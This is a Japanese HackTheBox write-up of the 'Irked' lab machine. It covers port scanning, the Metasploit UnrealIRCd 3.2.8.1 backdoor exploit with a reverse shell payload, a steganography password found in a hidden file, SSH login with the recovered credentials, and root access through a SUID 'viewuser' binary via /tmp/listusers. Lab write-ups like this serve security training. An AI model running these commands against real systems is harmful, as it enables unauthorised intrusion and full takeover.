🔥

HackTheBox Irked

2022/11/30に公開約11,400字

Irked

侵入

nmap

┌──(kali㉿kali)-[~/Desktop/Irked]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.10.117 -oN nmap.log
PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    syn-ack ttl 63 Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind syn-ack ttl 63 2-4 (RPC #100000)
6697/tcp  open  irc     syn-ack ttl 63 UnrealIRCd
8067/tcp  open  irc     syn-ack ttl 63 UnrealIRCd
35312/tcp open  status  syn-ack ttl 63 1 (RPC #100024)
65534/tcp open  irc     syn-ack ttl 63 UnrealIRCd

22、80番に加えて、いくつかのポートを確認

web


IRC is almost working という文字が出力されている

IRC

UnrealIRC が使用されていたので、searchsploit を実行してみる

┌──(kali㉿kali)-[~/Desktop/Irked]
└─$ searchsploit UnrealIRCd   
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                  | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                       | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                     | windows/dos/27407.pl
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

v3.2.8.1 に脆弱性を発見
脆弱性を調べるために、hexchat を実行し、接続を試みる

┌──(kali㉿kali)-[~/Desktop/Irked]
└─$ sudo hexchat

root として実行するため、sudo を使用する

すると、root で実行するべきではない的なメッセージが出力されるが、今回は無視

まず、+ Add をクリックし、名前を「Irked」とする
次に、Edit... をクリックし、IP アドレスを入力していく

一番上に、10.10.10.117/6697 と入力し、この画面は閉じる

そして、再度この画面で、Connect をクリックし、接続を開始する

接続が成功すると、上記のような表示が確認される。このまま、OK を押す

すると、詳細情報が確認され、version が 3.2.8.1 であることがわかった
バージョンが有効であることが確認できたため、exploit に移っていく

┌──(kali㉿kali)-[~/Desktop/Irked]
└─$ msfconsole

まずは、いつものように msfconsole を実行

msf6 > search UnrealIRCd

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor

msf6 > use 0
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >

UnrealIRC で search を行い、use で exploit をセットしていく
show options で詳細を確認していく

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

RHOSTS を設定する必要があり、RPORT を変更する必要がある

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.10.10.117
RHOSTS => 10.10.10.117
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
RPORT => 6697

10.10.10.117 と 6697 をセット
ここまでで、設定が完了したので実行に移る

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[-] 10.10.10.117:6697 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.

実行すると、payload が選択されていないというエラーが出てきた

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
No     Unix Command Shell, Bind TCP (via Ruby)
   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   payload/cmd/unix/reverse_bash_telnet_ssl                     normal

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 5
payload => cmd/unix/reverse

show payloads で payload を確認する。今回は、reverse を使用する

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.117     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6697             yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

payload により、LHOST を指定する必要でてきたので、指定する

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.10.14.4
LHOST => 10.10.14.4

今度こそ、準備は完璧

ircd としてのシェル

run

情報は完璧に設定できたので、run で実行する

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 10.10.14.4:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8xdambRYl2pqirSk;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8xdambRYl2pqirSk\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.4:4444 -> 10.10.10.117:47054) at 2022-11-30 00:40:01 +0900

whoami
ircd

侵入成功

列挙

home

ircd@irked:/home$ ls -l
ls -l
total 8
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5 08:41 djmardov
drwxr-xr-x  3 ircd     root     4096 Sep  5 08:41 ircd

home ディレクトリには、djmardov ユーザが存在し、ircd ディレクトリには user.txt がない

ircd@irked:/home/djmardov$ ls -l
ls -l
total 36
drwxr-xr-x 2 djmardov djmardov 4096 Sep  5 08:41 Desktop
drwxr-xr-x 2 djmardov djmardov 4096 Sep  5 08:41 Documents
drwxr-xr-x 2 djmardov djmardov 4096 Sep  5 08:41 Downloads
drwxr-xr-x 2 djmardov djmardov 4096 Sep  5 08:41 Music
drwxr-xr-x 2 djmardov djmardov 4096 Sep  5 08:41 Pictures
drwxr-xr-x 2 djmardov djmardov 4096 Sep  5 08:41 Public
drwxr-xr-x 2 djmardov djmardov 4096 Sep  5 08:41 Templates
-rw-r----- 1 root     djmardov   33 Nov 29 09:21 user.txt
drwxr-xr-x 2 djmardov djmardov 4096 Sep  5 08:41 Videos

djmardov ディレクトリに user.txt があり、ircd では見れないため、権限を移動する必要がある

Steg

Documents ディレクトリで、隠しファイルを発見

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

pw であることはわかったが、steg が何を指しているのかわからない
google で 「linux steg」と調べると、steganography が出てきた

┌──(kali㉿kali)-[~/Desktop/Irked]
└─$ wget http://10.10.10.117/irked.jpg                
--2022-11-30 01:09:22--  http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’

irked.jpg                       100%[=======================================================>]  33.88K  4.08KB/s    in 35s     

2022-11-30 01:10:02 (982 B/s) - ‘irked.jpg’ saved [34697/34697]

今回のボックスで確認できた画像は、初めての絵文字みたいなやつなので、ダウンロードする

┌──(kali㉿kali)-[~/Desktop/Irked]
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss 
wrote extracted data to "pass.txt".

steghide を使用し、データの抽出を試すと、pass.txt に data が抽出された

┌──(kali㉿kali)-[~/Desktop/Irked]
└─$ cat pass.txt    
Kab6h+m+bbp2J:HG

内容を見てみると、password が確認できた。

djmardov としてのシェル

SSH

取得した認証情報が SSH で使用できるか試してみる

┌──(kali㉿kali)-[~/Desktop/Irked]
└─$ ssh djmardov@10.10.10.117           
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ECDSA) to the list of known hosts.
djmardov@10.10.10.117's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ whoami
djmardov

権限移動成功

user フラグ

djmardov@irked:~$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

権限昇格

find

sudo は使えなかったので、find を実行し、suid があるファイルを検索する

djmardov@irked:~$ find / -type f -user root -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

viewuser を発見。いままでのボックスであまりみたことがないので、調べてみる
すると、権限昇格の手がかりとなる情報を発見

djmardov@irked:~$ echo sh > /tmp/listusers
djmardov@irked:~$ chmod 777 /tmp/listusers

記事によると、/tmp/listusers に実行したいコマンドを記述し、実行権限を付与するだけで権限昇格が狙えるらしい

root としてのシェル

viewuser

最後に、viewuser を実行する

djmardov@irked:~$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2022-11-30 08:40 (:0)
djmardov pts/0        2022-11-30 09:27 (10.10.14.6)
# whoami
root

権限昇格成功

root フラグ

# cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

攻略完了

所感

今回のボックスは、わかりやすい脆弱性が存在していたので比較的簡単だったが、viewuser での権限昇格は盲点すぎた。一度、実行結果をスルーし他を調べたので時間も結構かかってしまった。勝手に重要ではないと決めつけるのではなく、細かな情報にも目を向けることが大切だと改めて実感した。

Discussion

ログインするとコメントできます